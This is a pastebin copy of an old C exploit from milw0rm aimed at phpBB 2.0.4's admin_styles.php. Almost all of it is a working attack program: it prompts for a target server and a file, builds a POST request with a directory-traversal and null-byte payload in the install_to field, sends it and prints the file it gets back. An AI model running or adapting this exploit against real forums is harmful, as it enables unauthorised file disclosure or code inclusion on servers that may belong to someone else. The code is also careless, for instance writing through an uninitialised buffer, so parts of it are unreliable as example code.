Advertisement
FlyFar

phpBB 2.0.4 - PHP Remote File Inclusion

Feb 2nd, 2024
1,073
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 4.25 KB | Cybersecurity | 0 0
  1. /***********************************************************/
  2. /* phpBB 2.0.4 Remote Admin_Styles.PHP Theme_Info.CFG File Include  */
  3. /*                                                                                                    */
  4. /*                Exploit made on June 2003 by Spoofed Existence               */
  5. /*                                                                                                    */
  6. /*       Patch : http://www.phpbb.com/phpBB/viewtopic.php?t=113826      */
  7. /***********************************************************/
  8.  
  9. #include <stdio.h>
  10. #include <sys/types.h>
  11. #include <sys/socket.h>
  12. #include <netinet/in.h>
  13. #include <netdb.h>
  14.  
  15. int main()
  16. {
  17.  //The socket stuff
  18.  struct hostent *hp;
  19.  struct sockaddr_in sa;
  20.  int sock;
  21.  
  22.  //The input stuff
  23.  char server[100];
  24.  char location[100];
  25.  char sfile[100];
  26.  int escapes;
  27.  char* file;
  28.  
  29.  //The request stuff
  30.  char* request;
  31.  char* postdata;
  32.  char* header;
  33.  
  34.  //The buffer to store the response
  35.  char buffer[4096];
  36.  int tworeturns = 0;
  37.  int showing = 0;
  38.  
  39.  //Other
  40.  int i;
  41.  
  42.  //Ask the server
  43.  printf("Server: ");
  44.  scanf("%100s", server);
  45.  printf("Forum location: ");
  46.  scanf("%100s", location);
  47.  printf("Directories to escape: ");
  48.  scanf("%i", &escapes);
  49.  printf("File to get/execute: ");
  50.  scanf("%100s", sfile);
  51.  
  52.  
  53.  //Start the exploit!
  54.  printf("\n\nStarting the exploit...\n");
  55.  
  56.  //Connect to the server
  57.  printf("Creating socket... ");
  58.  if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  59.  {
  60.   printf("Failed!\n");
  61.   return 0;
  62.  } else{ printf("Done!\n");
  63.  }
  64.  
  65.  
  66.  printf("Looking up server IP... ");
  67.  if((hp = gethostbyname((char*)server)) == NULL)
  68.  {
  69.   printf("Failed!\n");
  70.   return 0;
  71.  } else { printf("Done!\n");
  72.  }
  73.  
  74.  
  75.  printf("Connecting %s:80... ", server);
  76.  memcpy(&sa.sin_addr, hp->h_addr_list[0], hp->h_length);
  77.  sa.sin_family = AF_INET;
  78.  sa.sin_port = htons(80);
  79.  if(connect(sock, (struct sockaddr*)&sa, sizeof(sa)))
  80.  {
  81.   printf("Failed!\n");
  82.   return 0;
  83.  } else { printf("Done!\n");
  84.  }
  85.  
  86.  
  87.  //Create the request
  88.  printf("Building request... ");
  89.  
  90.  //Create the postdata
  91.  file = (char*)malloc(sizeof(char) * (escapes * 3 + strlen(sfile) + 1));
  92.  
  93.  while(escapes > 0)
  94.  {
  95.   if(escapes == 1)
  96.   {
  97.    sprintf(file, "%s%s%s", file, "..", sfile);
  98.   } else { sprintf(file, "%s%s", file, "../");
  99.   }
  100.  
  101.   escapes --;
  102.  }
  103.  
  104.  postdata = (char*)malloc((27 + strlen(file)) * sizeof(char));
  105.  sprintf(postdata, "send_file= &install_to=%s%s00", file, "%");
  106.  
  107.  header = (char*)malloc((170 + strlen(server) + strlen(location)) *
  108. sizeof(char));
  109.  sprintf(header, "POST /%s/admin/admin_styles.php?mode=addnew
  110. HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nHost:
  111. %s\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", location, server,
  112. strlen(postdata));
  113.  
  114.  request = (char*)malloc((strlen(postdata) + strlen(header) + 1) *
  115. sizeof(char));
  116.  sprintf(request, "%s%s", header, postdata);
  117.  
  118.  printf("Done!\n");
  119.  
  120.  
  121.  //Send the request
  122.  printf("Sending request... ");
  123.  write(sock, request, strlen(request));
  124.  printf("Done!\n");
  125.  
  126.  printf("\nResponse:\n");
  127.  //Get the response
  128.  while(recv(sock, buffer, 4096, 0) != 0)
  129.  {
  130.   for(i = 0; i < strlen(buffer); i++)
  131.   {
  132.    //Only show the character when it should
  133.    if(showing == 1)
  134.    {
  135.     printf("%c", buffer[ i ]);
  136.    }
  137.  
  138.  
  139.    //Stop showing from \n<br>\n
  140.    if(buffer[ i ] == '\n' && buffer[i + 1] == '<' && buffer[i + 2] == 'b' &&
  141. buffer[i + 3] == 'r' && buffer[i + 4] == '>' && buffer[i + 5] == '\n' &&
  142. showing == 1)
  143.    {
  144.     showing = 0;
  145.     tworeturns = 0;
  146.    }
  147.    //Or from \n<br />\n
  148.    if(buffer[ i ] == '\n' && buffer[i + 1] == '<' && buffer[i + 2] == 'b' &&
  149. buffer[i + 3] == 'r' && buffer[i + 4] == ' ' && buffer[i + 5] == '/' &&
  150. buffer[i + 6] == '>' && buffer[i + 7] == '\n' && showing == 1)
  151.    {
  152.     showing = 0;
  153.     tworeturns = 0;
  154.    }
  155.  
  156.    //If there's a return and tworeturns = true, start showing it
  157.    if(buffer[ i ] == '\n' && tworeturns == 1)
  158.    {
  159.     showing = 1;
  160.    }
  161.  
  162.    //If there are two returns, set tworeturns to true and add 3 to i
  163.    if(buffer[ i ] == '\r' && buffer[i + 1] == '\n' && buffer[i + 2] == '\r'
  164. && buffer[i + 3] == '\n')
  165.    {
  166.     tworeturns = 1;
  167.     i += 3;
  168.    }
  169.   }
  170.  }
  171.  printf("\n");
  172.  
  173.  return 0;
  174. }
  175.  
  176. // milw0rm.com [2003-06-30]
  177.        
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement